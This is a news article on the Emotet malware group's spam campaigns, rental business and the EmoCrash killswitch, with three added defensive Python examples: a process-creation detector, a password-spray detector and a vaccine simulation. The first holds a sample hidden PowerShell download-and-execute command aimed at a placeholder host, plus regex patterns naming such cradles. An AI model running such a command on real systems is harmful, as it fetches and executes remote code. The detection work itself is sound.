Published on August 26th, 2020
Emotet: Why did the ‘most wanted’ malware go on a 5-month hiatus?
Emotet is more than a piece of malware. The threat group attacks networks and rents out access to other groups such as crypto-miner, banking trojan and ransomware operators. Since its return in mid-July, the malware has impacted 5% of organisations globally.
The most wanted malware returned after a five-month hiatus in mid-July 2020. It marked its return by sending waves of spam campaigns affecting organisations globally.
Known as Emotet among the cyber security community, the malware group broke its period of inactivity in July with a massive threat campaign with well over 250,000 emails containing malicious macros.
In the same month, it impacted 5% of organisations globally and made it to the top of the Global Threat Index, according to Check Point Research, a cyber security firm.
Malware is software intentionally used to damage computer networks or steal data. The stolen information is often sold on the dark web or given back to the owner for a ransom. At other times, cybercriminals simply publish it in the open.
Emotet operators spread malspam campaigns both on their own behalf and, at other times, in support of other threat actors seeking to steal banking credentials and gain illicit access to infected networks.
The group’s method is simple: it sends a malicious document named “form.doc” or “invoice.doc” via email to an unsuspecting user.
Once that person opens the attachment, the malicious macro launches PowerShell, which runs code fetched from remote websites to spread the threat across the entire network the user is connected to.
The infected network is then added to Emotet’s botnet. That means the hacker takes full control of the network from a remote location.
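The delivery chain above (a Word document whose macro launches PowerShell to fetch code from a remote site) leaves a recognisable trace in process-creation telemetry: an Office application as the parent of a script host whose command line contains a download-and-execute cradle. The detection rule below is an added example, not code from the article or from any vendor named in it. The event records are constructed for the example, and their field names (`parent`, `image`, `cmdline`) are an assumption that loosely mirrors what a process-creation log source such as Sysmon would carry.

```python
"""Added example: flag an Office application spawning a script host that
reaches out to a remote URL.  The telemetry below is constructed for this
example and the field layout is an assumption, not a real capture."""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe"}
# Command-line fragments that indicate remote code is fetched and executed.
DOWNLOAD_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"start-bitstransfer|\biex\b|invoke-expression|-enc\b|-encodedcommand)",
    re.IGNORECASE,
)
URL = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample telemetry (not from a real incident).
SAMPLE_EVENTS = [
    {"host": "ws01",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -nop -ep bypass -c \"IEX (New-Object "
                "Net.WebClient).DownloadString('http://example.invalid/form.doc')\""},
    {"host": "ws02",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
    {"host": "ws03",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c echo hello"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev):
    """Return the reasons an event is suspicious; an empty list means benign."""
    reasons = []
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        # An Office app spawning a script host is unusual on its own ...
        reasons.append(f"{parent} spawned {image}")
        # ... and a download cradle or URL in the command line makes it an alert.
        if DOWNLOAD_CRADLE.search(cmd):
            reasons.append("download/execute cradle in command line")
        if URL.search(cmd):
            reasons.append("remote URL in command line")
    return reasons


def find_suspicious(events):
    """Map host -> reasons for every event that trips the rule."""
    return {ev["host"]: r for ev in events if (r := score_event(ev))}


if __name__ == "__main__":
    for host, reasons in find_suspicious(SAMPLE_EVENTS).items():
        print(host, "->", "; ".join(reasons))
```

The rule deliberately fires on the parent/child pair alone (ws03 above) so that an analyst sees the weaker signal too; the cradle and URL checks raise the severity rather than gate the alert, which is the trade-off a detection engineer would tune per environment.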
‘Malware as a Service’ model
This type of attack is called a ‘loader’ operation, and Emotet is said to be one of the biggest players in the cybercrime world, as other malware operators like TrickBot and Qbot rent access from the ‘most wanted’ malware.
Emotet rents out infected networks to other threat actors such as crypto-miners, banking trojans and ransomware installers, who use them to gain illicit access to company servers.
The malware is said to be operated from Russia, and its operator is nicknamed Ivan by cyber security researchers.
Its operations did not start out on a Malware as a Service (MaaS) business model when it first gained prominence in the cybercrime world six years ago.
Back in 2014, Emotet surreptitiously entered users’ devices as a banking trojan, lurked inside and stole their credentials and passwords.
In just a few years, the malware has metamorphosed from a mere one-off hacker into an infrastructure provider for other threat actors to run campaigns and steal data.
Its distinctive way of infecting networks, spreading the threat laterally after gaining access to just a few devices in the network, makes it one of the toughest pieces of malware to beat.
Emotet’s self-propagating feature presents a particular challenge to organisations as the victims can get affected even without clicking the malicious links.
“Once on a computer, Emotet downloads and executes a spreader module that contains a password list that it uses to attempt to brute force access to other machines on the same network,” Symantec said in a blog post.
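The spreader behaviour Symantec describes (one infected host trying a password list against many neighbours) shows up in authentication logs as a burst of failed logons from a single source against several targets in a short window. The detection below is an added example, not code from the article or from Symantec. The log lines are constructed for the example; their layout (timestamp, event id, target host, source host, account) loosely follows a Windows Security export, where 4625 is a failed logon and 4624 a successful one, and is an assumption rather than a real capture.

```python
"""Added example: detect password-list spraying across a network from
constructed logon events.  The line format is an assumption; event ids
4625 (failed logon) and 4624 (successful logon) are the real Windows ids."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: timestamp  event_id  target_host  source_host  account
SAMPLE_LOG = """\
2020-07-17T09:00:01 4625 FS01 WS07 administrator
2020-07-17T09:00:02 4625 FS01 WS07 admin
2020-07-17T09:00:03 4625 FS01 WS07 backup
2020-07-17T09:00:04 4625 HR02 WS07 administrator
2020-07-17T09:00:05 4625 HR02 WS07 admin
2020-07-17T09:00:06 4625 DC01 WS07 administrator
2020-07-17T09:00:07 4624 DC01 WS07 administrator
2020-07-17T09:05:00 4625 FS01 WS12 jsmith
2020-07-17T09:30:00 4625 FS01 WS12 jsmith
"""


def parse(log_text):
    """Yield (time, event_id, target, source, account) tuples."""
    for line in log_text.splitlines():
        ts, eid, target, source, account = line.split()
        yield datetime.fromisoformat(ts), int(eid), target, source, account


def detect_spray(events, window=timedelta(minutes=2), min_failures=5, min_targets=2):
    """Return {source: (failure_count, sorted_targets)} for every source whose
    failed logons inside a sliding `window` reach min_failures and touch at
    least min_targets distinct hosts.  A single user mistyping a password
    against one server (WS12 in the sample) does not qualify."""
    by_source = defaultdict(list)
    for t, eid, target, source, _ in events:
        if eid == 4625:
            by_source[source].append((t, target))
    hits = {}
    for source, fails in by_source.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            # Advance the window start until the span fits inside `window`.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            chunk = fails[start:end + 1]
            targets = {tg for _, tg in chunk}
            if len(chunk) >= min_failures and len(targets) >= min_targets:
                hits[source] = (len(chunk), sorted(targets))
    return hits


def successes_from_sprayers(events, sprayers):
    """Successful logons from a spraying source: the hosts the spreader got into,
    which is where incident response should look first."""
    return sorted({(source, target) for _, eid, target, source, _ in events
                   if eid == 4624 and source in sprayers})


if __name__ == "__main__":
    evs = list(parse(SAMPLE_LOG))
    sprayers = detect_spray(evs)
    print("spraying sources:", sprayers)
    print("successful logons from them:", successes_from_sprayers(evs, sprayers))
```

The thresholds (five failures across two or more hosts within two minutes) are illustrative; the useful property is the combination of volume and breadth, since a legitimate user rarely fails against several different servers in the same minute.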
Cryptolaemus – the Mealybug hunter group
During 2016 and the following year, Emotet, also known as Mealybug, transformed from being a small group of hackers who stole money from bank accounts into a malware loader that gave access to other threat groups.
It changed its codebase to infect victims and allow other malware operators to rent the network.
And as the number of threat campaigns using Emotet increased, a group of security researchers from different organisations decided to come together and share threat intelligence on the malware.
In 2018, they formed a group called Cryptolaemus to share details about indicators of compromise (IoC) with the broader infosec community. The group posted updates on their web page and Twitter handle. Their singular goal is to shut down the Mealybug.
The details shared by the group were used by other companies’ network administrators to detect threats early on. Interestingly, the group’s notes were also followed by Emotet operators.
“We have seen them [Emotet] change tactics minutes after our posts, often enough that it is more than simple coincidence. I am quite sure they are part of the many reading our posts as soon as they go live,” Joseph Roosen, a Cryptolaemus member and cyber security expert, told ZDNet.
Roosen also shared that the group has “even joked that they (Emotet) are now calling the three botnets as Epoch 1, Epoch 2, and Epoch 3 internally (based on the names we assigned them).”
The team has had some initial success in helping companies battle Emotet.
As a matter of fact, the malware group did stop its campaign for some time, almost a year after the bug-hunting group started sharing information.
“It’s interesting that Emotet was dormant for several months earlier this year, repeating a pattern we first observed in 2019,” said Maya Horowitz, Director, Threat Intelligence & Research, Products at Check Point.
But it turned out that Emotet was actually updating its features and capabilities to enhance future attacks. They were not planning to tap out yet.
The vulnerability and the vaccine
Emotet attacks surged in late 2019 and went on until February 2020. Just when the pandemic was affecting many countries, the malware’s campaign slowed to a halt.
The reason: someone from the Cryptolaemus group found a vulnerability in the malware.
“Just as attackers can exploit flaws in legitimate software to cause harm, defenders can also reverse-engineer malware to discover its vulnerabilities and then exploit those to defeat the malware,” James Quinn, security analyst at Binary Defense, said in a blog post.
Quinn discovered a bug in Emotet that could be exploited. He spotted a change in the malware’s persistence mechanism, the code that allows it to survive computer reboots.
In early February, Emotet released a massive codebase overhaul that changed its installation and persistence mechanism.
As part of the change, the malware removed the word list and file-name generation algorithm used in its past installs.
Instead, Emotet introduced a new algorithm that generated the filename used to save the malware on each victim system from a randomly chosen .exe or .dll system file name.
This filename was encrypted with an exclusive key and saved in a registry value keyed to the victim’s volume serial number.
“Around 37 hours after Emotet unveiled these changes, James Quinn finished the first version of the killswitch (or vaccine) that eventually became EmoCrash,” Binary Defense said in a blog post.
The killswitch would generate the registry value for each victim and set its data to null.
When Emotet checked the registry for the install marker, it would find the newly generated null value and derive the executable name “.exe”, the post added.
While this mechanism worked, it was very messy and still allowed Emotet to install—it just prevented Emotet from running successfully and reaching out over the network.
Quinn wanted to enhance the effectiveness of the killswitch so that it could pre-empt an Emotet attack.
His second version exploited a simple buffer overflow discovered in Emotet’s installation routine. It caused Emotet to crash during installation, before the malware could drop itself to its normal install locations, thus completely preventing installation.
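The first-generation vaccine described above works by pre-seeding the install marker so that the filename the malware derives from it degenerates to “.exe”. The simulation below is an added example that models only the logic the article states; it is not Binary Defense’s EmoCrash code and not Emotet’s. The registry is a plain dictionary, the value-name layout (the serial number rendered as hex) and the “exclusive key” cipher (a stand-in XOR keyed on the serial) are assumptions, and the serial number and system file names are constructed.

```python
"""Added example: a minimal model of the registry-marker vaccine.  The
registry is a dict, the cipher is a stand-in XOR and the value-name layout
is an assumption; none of this is the real malware's or EmoCrash's code."""

VOLUME_SERIAL = 0x1A2B3C4D                  # constructed sample serial number
SYSTEM_NAMES = ["shell32", "kernel32", "user32"]  # constructed stand-in names


def value_name(serial):
    """Registry value name keyed to the volume serial (assumed layout)."""
    return f"{serial:08X}"


def xor_crypt(data, serial):
    """Stand-in for the 'exclusive key' encryption; symmetric, so it decrypts too."""
    key = serial.to_bytes(4, "little")
    return bytes(b ^ key[i % 4] for i, b in enumerate(data))


def read_install_marker(registry, serial):
    """What the install routine sees: the stored name, '' for null data,
    or None when no marker exists yet."""
    stored = registry.get(value_name(serial))
    if stored is None:
        return None
    return xor_crypt(stored, serial).decode("ascii", errors="replace")


def derive_exe_name(registry, serial, chosen_name):
    """Model of the install step: reuse an existing marker, otherwise create
    one from the chosen system file name, then build '<name>.exe'."""
    marker = read_install_marker(registry, serial)
    if marker is None:
        registry[value_name(serial)] = xor_crypt(chosen_name.encode(), serial)
        marker = chosen_name
    return marker + ".exe"


def apply_vaccine(registry, serial):
    """The defender's step: pre-create the marker with null (empty) data."""
    registry[value_name(serial)] = b""


def install_would_run(registry, serial, chosen_name):
    """True when the derived name is usable; the vaccinated case yields '.exe'."""
    return derive_exe_name(registry, serial, chosen_name) != ".exe"


if __name__ == "__main__":
    clean, vaccinated = {}, {}
    apply_vaccine(vaccinated, VOLUME_SERIAL)
    print("unvaccinated:", derive_exe_name(clean, VOLUME_SERIAL, SYSTEM_NAMES[0]))
    print("vaccinated:  ", derive_exe_name(vaccinated, VOLUME_SERIAL, SYSTEM_NAMES[0]))
```

The model makes the article’s caveat concrete: the vaccine does not stop the marker from being read or the install logic from running, it only leaves the malware with a useless name, which is why the second-generation killswitch that crashed the installer outright was the bigger win.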
Quinn and the team of infosec researchers kept the killswitch private so that the malware actors would not know about the vaccine they found.
This killswitch was alive from Feb 6th, 2020 to Aug 6th, 2020, or 182 days, the period of Emotet’s hiatus.